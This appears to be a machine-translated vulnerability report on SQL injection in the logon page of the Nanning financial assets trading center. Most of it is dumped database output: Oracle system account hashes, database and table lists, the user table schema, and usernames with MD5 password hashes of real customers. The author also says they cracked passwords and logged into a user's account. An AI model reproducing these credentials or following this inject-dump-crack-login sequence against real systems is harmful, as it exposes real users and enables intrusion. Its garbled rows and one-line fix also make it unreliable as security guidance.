The logon page of Nanning financial assets trading center has SQL injection to obtain user data.

The logon page of Nanning financial assets trading center has SQL injection to obtain user data.

Nanning financial assets trading center, a financial assets trading center with a well-known ZF background, has SQL Injection on the logon page to obtain user data and system data. As a financial enterprise, security awareness should be improved.

SQL Injection exists on the logon page of Nanning financial assets trading center to obtain user data and system data.

Injection point:

Http: // **. **/forget/forget_way.htm

Method:

Post

Injection parameters:

UserAccount = test

Obtains the encrypted string of the user password of the database system.

Database management system users password hashes:

[*] ANONYMOUS [1]:

Password hash: anonymous

[*] APEX_030200 [1]:

Password hash: CFE5EDE8C2369EE8

[*] APEX_PUBLIC_USER [1]:

Password hash: FDFC59C58F2C86BE

[*] APPQOSSYS [1]:

Password hash: 519D632B7EE7F63A

[*] DBSNMP [1]:

Password hash: E066D214D5421CCC

[*] DIP [1]:

Password hash: CE4A36B8E06CA59C

[*] EXFSYS [1]:

Password hash: 33C758A8E388DEE5

[*] FLOWS_FILES [1]:

Password hash: 88291679880D9C87

[*] MDSYS [1]:

Password hash: 72979A94BAD2AF80

[*] NNFAE_JRZC [1]:

Password hash: 57A08D84D1A2E8DD

[*] NNGQ [1]:

Password hash: EB990FBF01940CCB

[*] NNGQ_LIST_PROD [1]:

Password hash: ECCABC819B05C763

[*] ORACLE_OCM [1]:

Password hash: 5A2E026A9157958C

[*] ORDDATA [1]:

Password hash: A93EC937FCD1DC2A

[*] ORDPLUGINS [1]:

Password hash: 88A2B2C183431F00

[*] ORDSYS [1]:

Password hash: 7EFA02EC7EA6B86F

[*] OUTLN [1]:

Password hash: 4A3BA55E08595C81

[*] SI_INFORMTN_SCHEMA [1]:

Password hash: 84B8CBCA4D477FA3

[*] SYS [1]:

Password hash: 3E4777E635847F87

[*] SYSTEM [1]:

Password hash: EF2C4E4B7A3EBA05

[*] WMSYS [1]:

Password hash: 7C9BA362F8314299

[*] XDB [1]:

Password hash: 88D8364765FCE6AF

Obtains the user's database information.

Available databases [15]:

[*] APEX_030200

[*] APPQOSSYS

[*] DBSNMP

[*] EXFSYS

[*] FLOWS_FILES

[*] MDSYS

[*] NNFAE_JRZC

[*] NNGQ_LIST_PROD

[*] ORDDATA

[*] ORDSYS

[*] OUTLN

[*] SYS

[*] SYSTEM

[*] WMSYS

[*] XDB

User table obtained

Database: NNFAE_JRZC

[210 tables]

+ -------------------------------- +

| AREA |

| AUCTION_BID_RECORD |

| AUCTION_BID_RECORD_HIS |

| AUCTION_HALL |

| AUCTION_LATEST_BID |

| AUCTION_LOG |

| AUCTION_RESULT |

........

Too many others ignored

Key table information

Database: NNFAE_JRZC

Table: UC_USERS

[31 columns]

+ ---------------------- + -------------- +

| Column | Type |

+ ---------------------- + -------------- +

| ACCOUNT | VARCHAR2 |

| ACTIVITY_NAME | VARCHAR2 |

| ACTIVITY_SORT_NO | VARCHAR2 |

| AUDIT_REMARK | VARCHAR2 |

| CREATOR_ID | NUMBER |

| EXCHANGE_ID | NUMBER |

| EXT1 | VARCHAR2 |

| EXT2 | VARCHAR2 |

| EXT3 | VARCHAR2 |

| FORM_ID | NUMBER |

| GMT_AUDIT | TIMESTAMP (6) |

| GMT_CREATE | TIMESTAMP (6) |

| GMT_MODIFY | TIMESTAMP (6) |

| ID | NUMBER |

| INFO_APPLY | VARCHAR2 |

| INSTANCE_ID | VARCHAR2 |

| INTERFACE_QUERY_ATTR | VARCHAR2 |

| IS_DELETED | VARCHAR2 |

| LAST_LOGIN_IP | VARCHAR2 |

| LAST_LOGIN_TIME | TIMESTAMP (6) |

| LIST_ATTR | VARCHAR2 |

| LOGIN_ATTR | VARCHAR2 |

| LOGIN_NUM | NUMBER |

| LOGIN_PWD | VARCHAR2 |

| NAME | VARCHAR2 |

| PARENT_ID | NUMBER |

| PAY_PWD | VARCHAR2 |

| QUERY_ATTR | VARCHAR2 |

| REG_SOURCE | NUMBER |

| ROOT_USER_ID | NUMBER |

| STATUS | NUMBER |

+ ---------------------- + -------------- +

Just take the information of a few users

+ --------------- + ---------------------------------- +

| ACCOUNT | LOGIN_PWD | PAY_PWD |

+ --------------- + ---------------------------------- +

| Gq-zyy | 616bcfdaa912dd4844c516d334864664 | NULL |

| NULL | 616bcfdaa912dd4844c516d334864664 |

| Gq-zyy | 616bcfdaa912dd4844c516d334864664 | NULL |

| LSC5876 | af45b24d8121375abd1f60e82b17831c | NULL |

| NULL | ea1dc1fa88d7425a10c41895a4394910 |

| LSC5876 | ea1dc1fa88d7425a10c41895a4394910 | NULL |

| Liujian | b79f49bbef4909c92b9e3ba680a2f3bf | NULL |

| NULL | 5ae0bd6333593dcd13c4761e4b13fb7f |

| Liujian | b79f49bbef4909c92b9e3ba680a2f3bf | NULL |

| Telescopium | 5039d07b3c4463b24af96cc99390482c | NULL |

| NULL | 382c7216de7caf118062d2ff3accb6da |

| Telescopium | 5039d07b3c4463b24af96cc99390482c | NULL |

| Ray_mon | 198e29c2b493c8aa8a8a0e0d86d2ba6b | NULL |

| NULL |

| Ray_mon | 198e29c2b493c8aa8a8a0e0d86d2ba6b | NULL |

| Zcjb3 | 469823cc40a67d7e84da36b9c77cb47f | NULL |

| NULL | 469823cc40a67d7e84da36b9c77cb47f |

| Zcjb3 | 469823cc40a67d7e84da36b9c77cb47f | NULL |

| Cychen2 | 38d19a9614cb023fa770ab67798491dd | NULL |

| NULL | 45adbabc83cfa96c4477493f2a23293c |

| Cychen2 | 38d19a9614cb023fa770ab67798491dd | NULL |

| Cicihao123 | 67c41f9ac9badc7491f32adfc145c926 | NULL |

| NULL | b21936018f4ee947b08efbc34d7a1432 |

| Cicihao123 | 67c41f9ac9badc7491f32adfc145c926 | NULL |

| Chenfp | 6e541ff83fe5c1fddd4f47a4bf6f1507 | NULL |

| NULL | 198d6f87556d5a301e39de7d75ce491c |

| Chenfp | 528fcebc33889e6594805ecee09f32b2 | NULL |

| Wjj1027 | eae12e7efc5ffbaec22c941d1962ca52 | NULL |

| NULL | 0a55284001f97ac271d9c8a7d54a6ff1 |

| Wjj1027 | eae12e7efc5ffbaec22c941d1962ca52 | NULL |

| Hxh5122 | dc483e80a7a0bd9ef71d8cf971083924 | NULL |

| NULL | 9ef4c17538992366ffcb5f1a382f54c5 |

| Hxh5122 | 88534415d0c733258881a485f84bbd04 | NULL |

| Yyweijueyao | 5a0088b39f8ea02e3bd56e5af6c48bed | NULL |

| NULL | 3e9bee3bb61bddf9bb2213eb7c1f18e8 |

| Yyweijueyao | 3e9bee3bb61bddf9bb2213eb7c1f18e8 | NULL |

| LEGOLAS | d441134ec1_37adc057db5869ae8dc0 | NULL |

| NULL | 9f2795363596a2d8f5239b5ce7ce7e04 |

| LEGOLAS | d441134ec1_37adc057db5869ae8dc0 | NULL |

| Banlinongnong | efed4dba76f9fe039ffe01e41c10ed50 | NULL |

| NULL | f881a94286d7679be1faf2e3f0ef5e5d |

| Banlinongnong | efed4dba76f9fe039ffe01e41c10ed50 | NULL |

| Songliang | 7a34fc759e6eba611fef18f4c75887b6 | NULL |

| NULL | 84a9b74e738edd81a10003fce931860e |

| Songliang | 7a34fc759e6eba611fef18f4c75887b6 | NULL |

| Huangjunqi | f821167384cf0cca29469833f00008aa | NULL |

| NULL |

| Huangjunqi | f821167384cf0cca29469833f00008aa | NULL |

| Zhzhhghd | 81f78b138cbdc0d89dab77d3b7ce6265 | NULL |

| NULL | 7d82165501bc901fc71adc3a9bc07ff6 |

| Zhzhhghd | 81f78b138cbdc0d89dab77d3b7ce6265 | NULL |

| Mayhuang | 7d221923aa27532d507318cf66159092 | NULL |

Visual MD5 Algorithm for Password Encryption

You can obtain the following passwords by decrypting a few users:

Test009 test002

Test logon. The account must be activated.

Change your account to hxh5122.

Login, haha, this account is expected

Something detailed

So far, I don't want to continue.

Solution:

It should be difficult to filter the corresponding characters.